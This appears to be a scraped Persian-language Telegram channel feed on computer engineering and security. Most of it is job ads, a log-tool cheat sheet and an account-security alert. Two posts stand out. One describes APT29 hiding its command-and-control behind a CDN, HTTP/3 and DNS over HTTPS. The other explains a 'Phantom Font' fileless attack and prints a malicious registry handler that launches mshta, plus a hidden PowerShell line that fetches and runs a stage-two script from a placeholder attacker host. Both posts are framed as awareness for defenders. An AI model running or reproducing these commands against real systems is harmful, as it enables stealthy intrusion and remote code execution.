🎯 حمله سایبری APT29 با C2 نامرئی – ترکیب CDN، HTTP/3 و DoH
در سال ۱۴۰۲، سازمان امنیت ملی آمریکا و شرکت امنیتی Mandiant اعلام کردند که گروه هکری APT29، وابسته به سرویس اطلاعات خارجی روسیه، موفق شدهاند به یکی از نهادهای دیپلماتیک ایالات متحده نفوذ کنند.
آنچه این عملیات را به یکی از پیچیدهترین حملات سایبری اخیر تبدیل کرد، زیرساخت فرماندهی و کنترل (C2) آن بود که عملا از دید هر سیستم مانیتورینگ پنهان مانده بود.
فاز اول – پنهانسازی C2 پشت شبکه توزیع محتوا (CDN)
به جای استفاده از یک سرور C2 مستقیم، مهاجمان دامنهای مشابه سرویسهای بهروزرسانی رسمی ثبت کردند و آن را از طریق Cloudflare به سرور واقعی خود مسیردهی کردند.
مزیت این کار:
تمام ارتباطات با C2 در قالب ترافیک HTTPS معتبر به یک CDN شناختهشده انجام میشد.
سیستمهای امنیتی مقصد فقط «cloudflare.com» را به عنوان مقصد میدیدند.
امکان بلاک کردن ترافیک بدون اختلال گسترده در سرویسهای دیگر تقریبا وجود نداشت.
فاز دوم – استفاده از پروتکل HTTP/3 مبتنی بر QUIC
به جای HTTP/1.1 یا HTTP/2، مهاجمان از HTTP/3 روی بستر QUIC بهره بردند.
این انتخاب چند مزیت حیاتی داشت:
برقراری ارتباط روی UDP/443 به جای TCP، که بسیاری از ابزارهای NIDS/IPS بهخوبی آن را تحلیل نمیکنند.
رمزگذاری لایه حمل به شکلی که حتی پس از TLS Inspection، الگوهای ترافیکی شناساییپذیر نباشند. امکان تغییر مسیر و زیرساخت با حداقل وقفه در صورت شناسایی.
فاز سوم – مخفیسازی درخواستهای DNS با DoH
در این روش، درخواستهای DNS سنتی روی پورت ۵۳ حذف شده و به جای آن از DNS over HTTPS استفاده شد.
به این ترتیب:
هر Query به شکل یک درخواست HTTPS رمزگذاریشده به سرور DoH (مثلاً
هیچ لاگ قابلمشاهدهای در DNS Resolver سازمان مقصد وجود نداشت.
تشخیص دامنههای مخرب از روی ترافیک شبکه بهشدت دشوار شد.
فاز چهارم – بارگذاری و اجرای Implant
مهاجمان از طریق فایلهای فیشینگ (ISO یا Word با ماکرو)، یک Implant نوشتهشده با Golang را روی سیستم قربانی مستقر کردند.
ویژگیهای این Implant:
کراسپلتفرم بودن (Windows/Linux)
فشردهسازی با UPX برای جلوگیری از شناسایی توسط آنتیویروسها
برقراری Beacon نامنظم به دامنه C2 از طریق HTTP/3 و DoH
پشتیبانی از اجرای فرمان، استخراج فایلها و حرکت جانبی (Lateral Movement) در شبکه داخلی
فاز پنجم – فرار از شناسایی
ترکیب این سه تکنیک (CDN + HTTP/3 + DoH) باعث شد:
ترافیک C2 با ترافیک عادی مرورگرها یکسان به نظر برسد.
ابزارهای امنیتی سنتی هیچ الگوی مشخصی از Beaconing پیدا نکنند.
حتی تحلیلگران SOC، بدون استفاده از روشهای پیشرفته تحلیل متادیتا، نتوانند ارتباطات مخرب را از عادی تفکیک کنند.
روشهای شکار (Threat Hunting)
برای مقابله با چنین حملاتی، نیاز به پایش سطح پیشرفته وجود دارد:
پروفایلسازی ترافیک QUIC و شناسایی ارتباطات غیرمرورگری روی UDP/443
بررسی Fingerprintهای TLS/JA3 و مقایسه با مرورگرهای استاندارد
تحلیل طول بستهها و فواصل زمانی ارسال آنها (Traffic Flow Analysis)
ایجاد لیست سفید برای سرورهای DoH و مسدودسازی موارد غیرمجاز
📌 نتیجهگیری:
این حمله نشان میدهد که گروههای پیشرفته (APT) دیگر نیازی به دامنههای مشکوک یا پورتهای غیرمعمول ندارند.
امروز، زیرساختهای قانونی مثل Cloudflare، Akamai و پروتکلهای مدرن مانند HTTP/3 و DoH میتوانند به راحتی به سپر نامرئی برای C2 مهاجمان تبدیل شوند.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
در سال ۱۴۰۲، سازمان امنیت ملی آمریکا و شرکت امنیتی Mandiant اعلام کردند که گروه هکری APT29، وابسته به سرویس اطلاعات خارجی روسیه، موفق شدهاند به یکی از نهادهای دیپلماتیک ایالات متحده نفوذ کنند.
آنچه این عملیات را به یکی از پیچیدهترین حملات سایبری اخیر تبدیل کرد، زیرساخت فرماندهی و کنترل (C2) آن بود که عملا از دید هر سیستم مانیتورینگ پنهان مانده بود.
فاز اول – پنهانسازی C2 پشت شبکه توزیع محتوا (CDN)
به جای استفاده از یک سرور C2 مستقیم، مهاجمان دامنهای مشابه سرویسهای بهروزرسانی رسمی ثبت کردند و آن را از طریق Cloudflare به سرور واقعی خود مسیردهی کردند.
مزیت این کار:
تمام ارتباطات با C2 در قالب ترافیک HTTPS معتبر به یک CDN شناختهشده انجام میشد.
سیستمهای امنیتی مقصد فقط «cloudflare.com» را به عنوان مقصد میدیدند.
امکان بلاک کردن ترافیک بدون اختلال گسترده در سرویسهای دیگر تقریبا وجود نداشت.
فاز دوم – استفاده از پروتکل HTTP/3 مبتنی بر QUIC
به جای HTTP/1.1 یا HTTP/2، مهاجمان از HTTP/3 روی بستر QUIC بهره بردند.
این انتخاب چند مزیت حیاتی داشت:
برقراری ارتباط روی UDP/443 به جای TCP، که بسیاری از ابزارهای NIDS/IPS بهخوبی آن را تحلیل نمیکنند.
رمزگذاری لایه حمل به شکلی که حتی پس از TLS Inspection، الگوهای ترافیکی شناساییپذیر نباشند. امکان تغییر مسیر و زیرساخت با حداقل وقفه در صورت شناسایی.
فاز سوم – مخفیسازی درخواستهای DNS با DoH
در این روش، درخواستهای DNS سنتی روی پورت ۵۳ حذف شده و به جای آن از DNS over HTTPS استفاده شد.
به این ترتیب:
هر Query به شکل یک درخواست HTTPS رمزگذاریشده به سرور DoH (مثلاً
cloudflare-dns.com) ارسال میشد.هیچ لاگ قابلمشاهدهای در DNS Resolver سازمان مقصد وجود نداشت.
تشخیص دامنههای مخرب از روی ترافیک شبکه بهشدت دشوار شد.
فاز چهارم – بارگذاری و اجرای Implant
مهاجمان از طریق فایلهای فیشینگ (ISO یا Word با ماکرو)، یک Implant نوشتهشده با Golang را روی سیستم قربانی مستقر کردند.
ویژگیهای این Implant:
کراسپلتفرم بودن (Windows/Linux)
فشردهسازی با UPX برای جلوگیری از شناسایی توسط آنتیویروسها
برقراری Beacon نامنظم به دامنه C2 از طریق HTTP/3 و DoH
پشتیبانی از اجرای فرمان، استخراج فایلها و حرکت جانبی (Lateral Movement) در شبکه داخلی
فاز پنجم – فرار از شناسایی
ترکیب این سه تکنیک (CDN + HTTP/3 + DoH) باعث شد:
ترافیک C2 با ترافیک عادی مرورگرها یکسان به نظر برسد.
ابزارهای امنیتی سنتی هیچ الگوی مشخصی از Beaconing پیدا نکنند.
حتی تحلیلگران SOC، بدون استفاده از روشهای پیشرفته تحلیل متادیتا، نتوانند ارتباطات مخرب را از عادی تفکیک کنند.
روشهای شکار (Threat Hunting)
برای مقابله با چنین حملاتی، نیاز به پایش سطح پیشرفته وجود دارد:
پروفایلسازی ترافیک QUIC و شناسایی ارتباطات غیرمرورگری روی UDP/443
بررسی Fingerprintهای TLS/JA3 و مقایسه با مرورگرهای استاندارد
تحلیل طول بستهها و فواصل زمانی ارسال آنها (Traffic Flow Analysis)
ایجاد لیست سفید برای سرورهای DoH و مسدودسازی موارد غیرمجاز
📌 نتیجهگیری:
این حمله نشان میدهد که گروههای پیشرفته (APT) دیگر نیازی به دامنههای مشکوک یا پورتهای غیرمعمول ندارند.
امروز، زیرساختهای قانونی مثل Cloudflare، Akamai و پروتکلهای مدرن مانند HTTP/3 و DoH میتوانند به راحتی به سپر نامرئی برای C2 مهاجمان تبدیل شوند.
Please open Telegram to view this post
VIEW IN TELEGRAM
ما در Barook | باروک دنبال یه نگهبان سایبری #Cyber_Security پرشور میگردیم!
اگر تو از اونایی هستی که با کشف یه آسیبپذیری ذوق میکنی، از خنثی کردن تهدیدات سایبری کیف میکنی و عاشق اینی که شبکهها و سیستمها رو مثل یه قلعه نفوذ ناپذیرکنی🛡، جای تو توی تیم ما خالیه!
🔶چی ازت میخوایم؟
🔹تسلط به ابزارهای امنیتی مثل Nessus، Nmap،فایروالها و سیستمهای SIEM
🔹تجربه واقعی کار با تهدیدات سایبری (نه فقط سناریوهای تمرینی)
🔹آشنایی با استانداردهای امنیتی مثل ISO 27001، NIST یا CIS
🔹مهارت تو تست نفوذ، تحلیل ریسک و مستندسازی حرفهای
🔹خلاقیت تو پیدا کردن راهکارهای امنیتی و حل مسئله
🔹روحیه تیمی و توانایی کار تو محیط سریع و پرچالش
🔷چی برات داریم؟
🔸یه تیم باحال، حرفهای و بدون حاشیه
🔸فضای رشد، یادگیری و دیده شدن ایدههات
🔸پروژههایی که واقعاً امنیت سازمان رو متحول میکنن
🔸ساعت کاری منعطف و محیطی که توش راحتی
حس میکنی این شغل برات ساخته شده؟
بیا با هم دنیای سایبری رو امنتر کنیم!
📩 رزومهتو بفرست به لینک زیر یا یه پیام بده که بتونیم گپ بزنیم.
https://B2n.ir/yq7413
#استخدام
#کارشناس_امنیت_فناوری_اطلاعات
#IT_Security_Specialist
#Cyber_Security
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
اگر تو از اونایی هستی که با کشف یه آسیبپذیری ذوق میکنی، از خنثی کردن تهدیدات سایبری کیف میکنی و عاشق اینی که شبکهها و سیستمها رو مثل یه قلعه نفوذ ناپذیرکنی🛡، جای تو توی تیم ما خالیه!
🔶چی ازت میخوایم؟
🔹تسلط به ابزارهای امنیتی مثل Nessus، Nmap،فایروالها و سیستمهای SIEM
🔹تجربه واقعی کار با تهدیدات سایبری (نه فقط سناریوهای تمرینی)
🔹آشنایی با استانداردهای امنیتی مثل ISO 27001، NIST یا CIS
🔹مهارت تو تست نفوذ، تحلیل ریسک و مستندسازی حرفهای
🔹خلاقیت تو پیدا کردن راهکارهای امنیتی و حل مسئله
🔹روحیه تیمی و توانایی کار تو محیط سریع و پرچالش
🔷چی برات داریم؟
🔸یه تیم باحال، حرفهای و بدون حاشیه
🔸فضای رشد، یادگیری و دیده شدن ایدههات
🔸پروژههایی که واقعاً امنیت سازمان رو متحول میکنن
🔸ساعت کاری منعطف و محیطی که توش راحتی
حس میکنی این شغل برات ساخته شده؟
بیا با هم دنیای سایبری رو امنتر کنیم!
📩 رزومهتو بفرست به لینک زیر یا یه پیام بده که بتونیم گپ بزنیم.
https://B2n.ir/yq7413
#استخدام
#کارشناس_امنیت_فناوری_اطلاعات
#IT_Security_Specialist
#Cyber_Security
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
سلام
تیم Ciclo (استارتاپ فعال گروه گلرنگ ونچرز) دنبال دو همتیمی پرانرژی هست تا با هم مسیر رشد و توسعه اپلیکیشنمون رو جلو ببریم! اگر تجربه یا علاقه دارید تو فضای استارتاپی کار کنید، خوشحال میشیم پیام بدید.
موقعیتها:
Front-end developer (React Native / PWA)
Back-end developer (Python / Django)
📩 رزومهتون رو میتونید به این آدرس بفرستید یا از طریق لینکدین با من در تماس باشید:
manihamzezadehz@gmail.com
#استخدام
#ریموت
#فرصت_شغلی
#استارتاپ
#Hiring
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
تیم Ciclo (استارتاپ فعال گروه گلرنگ ونچرز) دنبال دو همتیمی پرانرژی هست تا با هم مسیر رشد و توسعه اپلیکیشنمون رو جلو ببریم! اگر تجربه یا علاقه دارید تو فضای استارتاپی کار کنید، خوشحال میشیم پیام بدید.
موقعیتها:
Front-end developer (React Native / PWA)
Back-end developer (Python / Django)
📩 رزومهتون رو میتونید به این آدرس بفرستید یا از طریق لینکدین با من در تماس باشید:
manihamzezadehz@gmail.com
#استخدام
#ریموت
#فرصت_شغلی
#استارتاپ
#Hiring
Please open Telegram to view this post
VIEW IN TELEGRAM
📜 راهنمای سریع ابزارهای تحلیل لاگ (Log Parsing Cheat Sheet)
🔍 ابزارهای اصلی تحلیل لاگ
1️⃣ GREP - جستجوی الگو در فایلها
2️⃣ NGREP - تحلیل پکتهای شبکه
3️⃣ CUT - استخراج فیلدهای ساختاریافته
4️⃣ SED - ویرایش و جایگزینی متن
5️⃣ SORT - مرتبسازی دادهها
6️⃣ UNIQ - حذف موارد تکراری
7️⃣ DIFF - مقایسه فایلها
8️⃣ AWK - پردازش دادههای پیشرفته
📂 ابزارهای مشاهده و مدیریت فایلها
1️⃣ HEAD - نمایش ابتدای فایل
2️⃣ TAIL - نمایش انتهای فایل
3️⃣ LESS - مشاهده هوشمند فایلها
4️⃣ COMM - مقایسه خطوط مشترک دو فایل
📊 ابزارهای تخصصی فرمتها
1️⃣ CSVCUT - پردازش فایلهای CSV
2️⃣ JQ - پردازش فایلهای JSON
3️⃣ TR - جایگزینی کاراکترها
4️⃣ CCZE - رنگیسازی لاگها
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
#linux #Cybersecurity #log
🔍 ابزارهای اصلی تحلیل لاگ
1️⃣ GREP - جستجوی الگو در فایلها
2️⃣ NGREP - تحلیل پکتهای شبکه
3️⃣ CUT - استخراج فیلدهای ساختاریافته
4️⃣ SED - ویرایش و جایگزینی متن
5️⃣ SORT - مرتبسازی دادهها
6️⃣ UNIQ - حذف موارد تکراری
7️⃣ DIFF - مقایسه فایلها
8️⃣ AWK - پردازش دادههای پیشرفته
📂 ابزارهای مشاهده و مدیریت فایلها
1️⃣ HEAD - نمایش ابتدای فایل
2️⃣ TAIL - نمایش انتهای فایل
3️⃣ LESS - مشاهده هوشمند فایلها
4️⃣ COMM - مقایسه خطوط مشترک دو فایل
📊 ابزارهای تخصصی فرمتها
1️⃣ CSVCUT - پردازش فایلهای CSV
2️⃣ JQ - پردازش فایلهای JSON
3️⃣ TR - جایگزینی کاراکترها
4️⃣ CCZE - رنگیسازی لاگها
#linux #Cybersecurity #log
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
بعضیها رسماً به مرحلهای رسیدن که دارن «چیزهای رایگان» رو هم میفروشن!
این روزها نسخه آماده #Nessus از طریق #Docker رایگان و در دسترس همهست… ولی دیدم بعضیها همین رو بستهبندی کردن و با قیمت بالا میدن به ملت 🤦♂️
هیچ جادوی خاصی پشتش نیست، فقط یک docker pull سادهست!
واقعاً حیفه که وقت و پول مردم صرف چیزی بشه که با یک خط دستور میشه آورد بالا.
📂 لینک نسخه آماده روی Docker Hub:
https://hub.docker.com/r/sakurashiro/nessus
#nessus #docker #vulnerability_assessment #cybersecurity #infosec #soc #securitytools #redteam #blueteam #hide01
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
این روزها نسخه آماده #Nessus از طریق #Docker رایگان و در دسترس همهست… ولی دیدم بعضیها همین رو بستهبندی کردن و با قیمت بالا میدن به ملت 🤦♂️
هیچ جادوی خاصی پشتش نیست، فقط یک docker pull سادهست!
واقعاً حیفه که وقت و پول مردم صرف چیزی بشه که با یک خط دستور میشه آورد بالا.
📂 لینک نسخه آماده روی Docker Hub:
https://hub.docker.com/r/sakurashiro/nessus
#nessus #docker #vulnerability_assessment #cybersecurity #infosec #soc #securitytools #redteam #blueteam #hide01
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍3👏1🕊1
اگر تجربه کار با Laravel داری و زبان انگلیسیت خوبه,
جات توی تیم ما خالیه!
ما یک تیم استرالیایی هستیم که روی پروژههای بینالمللی کار میکنیم و محیط کار کاملاً ریموت و دوستانه داریم.
شرایط کلی:
تسلط به Laravel و PHP
مهارتهای خوب انگلیسی برای ارتباط با تیم و کلاینتها
تعهد و روحیه تیمی
محل کار: ریموت (تماموقت)
حقوق: بر اساس مهارت و تجربه
اگر علاقهمند هستید، فرم زیر را پر کنید تا با شما تماس بگیریم:
https://docs.google.com/forms/d/e/1FAIpQLScCvHwuSESc6tL9XuojivlSNWEVTJKNbMCr6E0Gpmrk3QyqiQ/viewform?usp=dialog
#استخدام #آگهي_شغلي #دوركاري #ريموت #برنامه_نويسي #فرصت_شغلي #لاراول #laravel #php
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
جات توی تیم ما خالیه!
ما یک تیم استرالیایی هستیم که روی پروژههای بینالمللی کار میکنیم و محیط کار کاملاً ریموت و دوستانه داریم.
شرایط کلی:
تسلط به Laravel و PHP
مهارتهای خوب انگلیسی برای ارتباط با تیم و کلاینتها
تعهد و روحیه تیمی
محل کار: ریموت (تماموقت)
حقوق: بر اساس مهارت و تجربه
اگر علاقهمند هستید، فرم زیر را پر کنید تا با شما تماس بگیریم:
https://docs.google.com/forms/d/e/1FAIpQLScCvHwuSESc6tL9XuojivlSNWEVTJKNbMCr6E0Gpmrk3QyqiQ/viewform?usp=dialog
#استخدام #آگهي_شغلي #دوركاري #ريموت #برنامه_نويسي #فرصت_شغلي #لاراول #laravel #php
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد میشود!
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
چرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javanoscript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javanoscript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javanoscript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
🔸 هر اجرای ناگهانی mshta بدون فایل
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
C:\\Windows\\System32\\mshta.exeچرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javanoscript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
.reg را دانلود میکند.2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
fontview:// تعریف میکند.و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javanoscript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
fontview://load ریدایرکت میشود.پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javanoscript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید🔸 هر اجرای ناگهانی mshta بدون فایل
.hta را بررسی کنید🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👏2🔥1🎉1🤩1
هفت پلتفرم برای پیدا کردن شغل ریموت در ML/DL
ویژه مهندسان ایرانی
اگر ML/DL Engineer هستید و از ایران به دنبال فرصتهای ریموت یا با ویزا میگردید، این ۷ پلتفرم رو از دست ندین.
1. Wellfound (قبلاً AngelList):
– پلتفرم استارتاپها.
– مستقیم به Founder/CTO پیام بدید و فیلتر Seed–Series B برای تیمهای AI رو بزنید.
– پروفایلتون رو با GitHub لینک کنید!
2. RemoteOK:
– بورد ریموت با الرت روی کیوردهایی مثل "machine learning" یا "computer vision"
– تگ "Visa Sponsorship" رو اضافه کنید تا اولین اپلایکننده باشید.
3. Remotive :
– ریموت با فیلتر Time-Zone
– Newsletterشون رو subscribe کنید برای نقشهای انحصاری.
4. We Work Remotely:
- جستجوی پیشرفته با "Worldwide + AI/ML"
– عالی برای نقشهای senior با پروژههای واقعی مثل PyTorch.
5. Relocate.me:
– نقشهای فنی با ویزا و relocation.
– فیلتر "Visa Sponsorship" بزنید، به خصوص برای کانادا/آلمان که برای ایرانیها بازتره.
6. Landing.jobs:
– بورد اروپا (پرتغالمحور).
– Assessmentهای فنی رو پاس کنید تا به pool بالاتری برید
– تمرین LeetCode-style برای ML algorithms مثل CNN.
7.iBRIDGES:
– شبکه ایرانیان خارج.
– از LinkedIn برای connect مستقیم با فاندرهای AI در اروپا/آمریکا استفاده کنید.
پیشنهاد:
اینها رو با LinkedIn ترکیب کنید، رزومهتون رو ATS-friendly کنید. یعنی رزومه طوری نوشته بشه که سیستمهای غربالگری خودکار (Applicant Tracking System) بتوانند آن را به راحتی بخوانند و کلمات کلیدی مهم را شناسایی کنند.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
ویژه مهندسان ایرانی
اگر ML/DL Engineer هستید و از ایران به دنبال فرصتهای ریموت یا با ویزا میگردید، این ۷ پلتفرم رو از دست ندین.
1. Wellfound (قبلاً AngelList):
– پلتفرم استارتاپها.
– مستقیم به Founder/CTO پیام بدید و فیلتر Seed–Series B برای تیمهای AI رو بزنید.
– پروفایلتون رو با GitHub لینک کنید!
2. RemoteOK:
– بورد ریموت با الرت روی کیوردهایی مثل "machine learning" یا "computer vision"
– تگ "Visa Sponsorship" رو اضافه کنید تا اولین اپلایکننده باشید.
3. Remotive :
– ریموت با فیلتر Time-Zone
– Newsletterشون رو subscribe کنید برای نقشهای انحصاری.
4. We Work Remotely:
- جستجوی پیشرفته با "Worldwide + AI/ML"
– عالی برای نقشهای senior با پروژههای واقعی مثل PyTorch.
5. Relocate.me:
– نقشهای فنی با ویزا و relocation.
– فیلتر "Visa Sponsorship" بزنید، به خصوص برای کانادا/آلمان که برای ایرانیها بازتره.
6. Landing.jobs:
– بورد اروپا (پرتغالمحور).
– Assessmentهای فنی رو پاس کنید تا به pool بالاتری برید
– تمرین LeetCode-style برای ML algorithms مثل CNN.
7.iBRIDGES:
– شبکه ایرانیان خارج.
– از LinkedIn برای connect مستقیم با فاندرهای AI در اروپا/آمریکا استفاده کنید.
پیشنهاد:
اینها رو با LinkedIn ترکیب کنید، رزومهتون رو ATS-friendly کنید. یعنی رزومه طوری نوشته بشه که سیستمهای غربالگری خودکار (Applicant Tracking System) بتوانند آن را به راحتی بخوانند و کلمات کلیدی مهم را شناسایی کنند.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1🔥1
یکی از دوستان نیازمند نیروی اندروید کار و IOS کار هست
اگر رزومه خوبی دارید به ایدی زیر رزومه تونو بفرستید
مشهد - دورکاری
@Developer_Network
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
اگر رزومه خوبی دارید به ایدی زیر رزومه تونو بفرستید
مشهد - دورکاری
@Developer_Network
Please open Telegram to view this post
VIEW IN TELEGRAM
دوستانی که قصد اموزش " نگارش مقاله "
به صورت تضمینی برای Q1
که به شدت سختگیرانه شده در دنیا رو دارند
به ایدی زیر از دوستان ما هستند اعلام امادگی کنند
نگارش این مقاله برای حوزه امنیت و IOT و هوش مصنوعی خواهد بود
و بخشی مربوط به پزشکی
که همچنان این مقالات در بالاترین رده ی علمی در دنیا یعنی Q1 هست ...
@Developer_Network
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
به صورت تضمینی برای Q1
که به شدت سختگیرانه شده در دنیا رو دارند
به ایدی زیر از دوستان ما هستند اعلام امادگی کنند
نگارش این مقاله برای حوزه امنیت و IOT و هوش مصنوعی خواهد بود
و بخشی مربوط به پزشکی
که همچنان این مقالات در بالاترین رده ی علمی در دنیا یعنی Q1 هست ...
@Developer_Network
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1👏1🎉1👨💻1
استخدام گرافیست
مشهد
شرکت معتبر
حقوق و بیمه مزایا دارد...
لطفا روزمه رو به ایدی زیر ارسال کنید
@Developer_Network
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
مشهد
شرکت معتبر
حقوق و بیمه مزایا دارد...
لطفا روزمه رو به ایدی زیر ارسال کنید
@Developer_Network
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨 هشدار امنیتی فوری 🚨
اخیراً اطلاعات ورود بسیاری از حسابهای گوگل در اینترنت افشا شده است!
حتی اگر ورود دو مرحلهای رو برای حساب گوگل خود فعال کردهاید، باز هم لازم است همین حالا رمز عبور خود را تغییر دهید
🔒 برای امنیت بیشتر:
از رمز عبور قوی و غیرتکراری استفاده کنید
⏳ هر لحظه تأخیر ممکن است حساب شما را در معرض خطر قرار دهد.
👉 همین الان رمز عبور حساب گوگل خود را تغییر دهید
https://www.yahoo.com/news/articles/google-sounds-alarm-massive-data-174500558.html
https://www.forbes.com/sites/zakdoffman/2025/08/25/google-warns-most-gmail-users-must-change-passwords/
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
اخیراً اطلاعات ورود بسیاری از حسابهای گوگل در اینترنت افشا شده است!
حتی اگر ورود دو مرحلهای رو برای حساب گوگل خود فعال کردهاید، باز هم لازم است همین حالا رمز عبور خود را تغییر دهید
🔒 برای امنیت بیشتر:
از رمز عبور قوی و غیرتکراری استفاده کنید
⏳ هر لحظه تأخیر ممکن است حساب شما را در معرض خطر قرار دهد.
👉 همین الان رمز عبور حساب گوگل خود را تغییر دهید
https://www.yahoo.com/news/articles/google-sounds-alarm-massive-data-174500558.html
https://www.forbes.com/sites/zakdoffman/2025/08/25/google-warns-most-gmail-users-must-change-passwords/
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1🤯1😱1
آیا پذیرش در دانشگاههای آمریکا هم سهمیهای است؟
